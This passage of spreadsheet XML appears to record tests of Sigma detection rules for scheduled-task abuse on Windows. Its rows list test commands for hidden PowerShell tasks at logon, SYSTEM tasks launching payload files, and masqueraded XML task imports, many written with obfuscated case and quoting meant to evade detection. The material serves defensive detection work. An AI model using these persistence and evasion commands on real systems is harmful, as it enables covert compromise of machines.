          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C216" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D216" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E216" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J216" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B217" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C217" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D217" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E217" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J217" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B218" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C218" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D218" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E218" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J218" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B219" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C219" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D219" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E219" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J219" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B220" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C220" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D220" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E220" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J220" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B221" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C221" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D221" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E221" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -create -tn "SuspiciousTask2" -xml "C:\public\payload.bin" -f   # ignored_comment.xml</t>
        </is>
      </c>
      <c r="F221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I221" s="43" t="n"/>
      <c r="J221" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K221" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="222" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="n"/>
      <c r="B222" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C222" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D222" s="36" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E222" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\..\Admin\AppData\Local &amp;&amp; schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU SYSTEM"</t>
        </is>
      </c>
      <c r="F222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="43" t="n"/>
      <c r="J222" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K222" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="n"/>
      <c r="B223" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C223" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D223" s="36" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E223" s="43" t="n"/>
      <c r="F223" s="43" t="n"/>
      <c r="G223" s="43" t="n"/>
      <c r="H223" s="43" t="n"/>
      <c r="I223" s="43" t="n"/>
      <c r="J223" s="43" t="n"/>
      <c r="K223" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B224" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C224" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D224" s="36" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E224" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J224" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K224" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B225" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C225" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D225" s="36" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E225" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F225" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G225" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J225" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K225" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B226" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C226" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D226" s="36" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E226" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F226" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J226" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K226" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C227" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D227" s="36" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E227" s="36" t="n"/>
      <c r="F227" s="36" t="n"/>
      <c r="G227" s="36" t="n"/>
      <c r="H227" s="36" t="n"/>
      <c r="I227" s="36" t="n"/>
      <c r="J227" s="36" t="n"/>
      <c r="K227" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="n"/>
      <c r="B228" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C228" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D228" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E228" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F228" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G228" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="36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28" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C229" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D229" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E229" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"SC" ONCE /ST 00:00 /TN "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F229" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G229" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J229" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C230" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D230" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E230" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create -"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J230" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="n"/>
      <c r="B231" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C231" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D231" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E231" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /"TR" "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="36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31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="n"/>
      <c r="B232" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C232" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D232" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E232" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEAtE /"SC" ONCE -"ST" 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F232" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G232" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J232" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="n"/>
      <c r="B233" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C233" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D233" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E233" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /sC ONCE /sT 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J233" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K233" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="n"/>
      <c r="B234" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C234" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D234" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E234" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="36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34" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K234" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="n"/>
      <c r="B235" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C235" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D235" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E235" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAte /SC ONCE /St 00:00 /tN "UpdateTask" /tR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="36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35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="n"/>
      <c r="B236" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C236" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D236" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E236" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H236" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J236" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B237" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C237" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D237" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E237" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /TN "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I237" s="43" t="n"/>
      <c r="J237" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="238" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B238" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C238" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D238" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E238" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I238" s="43" t="n"/>
      <c r="J238" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="n"/>
      <c r="B239" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C239" s="36" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D239" s="36" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E239" s="36" t="n"/>
      <c r="F239" s="36" t="n"/>
      <c r="G239" s="36" t="n"/>
      <c r="H239" s="36" t="n"/>
      <c r="I239" s="36" t="n"/>
      <c r="J239" s="36" t="n"/>
      <c r="K239" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="n"/>
      <c r="B240" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_persistence_windows_telemetry</t>
        </is>
      </c>
      <c r="C240" s="36" t="inlineStr">
        <is>
          <t>Potential Persistence Via Microsoft Compatibility Appraiser</t>
        </is>
      </c>
      <c r="D240" s="36" t="inlineStr">
        <is>
          <t>f548a603-c9f2-4c89-b511-b089f7e94549</t>
        </is>
      </c>
      <c r="E240" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"RUN" /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"</t>
        </is>
      </c>
      <c r="F240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I240" s="43" t="n"/>
      <c r="J240" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="43" t="n"/>
      <c r="B241" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_persistence_windows_telemetry</t>
        </is>
      </c>
      <c r="C241" s="36" t="inlineStr">
        <is>
          <t>Potential Persistence Via Microsoft Compatibility Appraiser</t>
        </is>
      </c>
      <c r="D241" s="36" t="inlineStr">
        <is>
          <t>f548a603-c9f2-4c89-b511-b089f7e94549</t>
        </is>
      </c>
      <c r="E241" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"RUN" /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"</t>
        </is>
      </c>
      <c r="F241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I241" s="43" t="n"/>
      <c r="J241" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B242" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
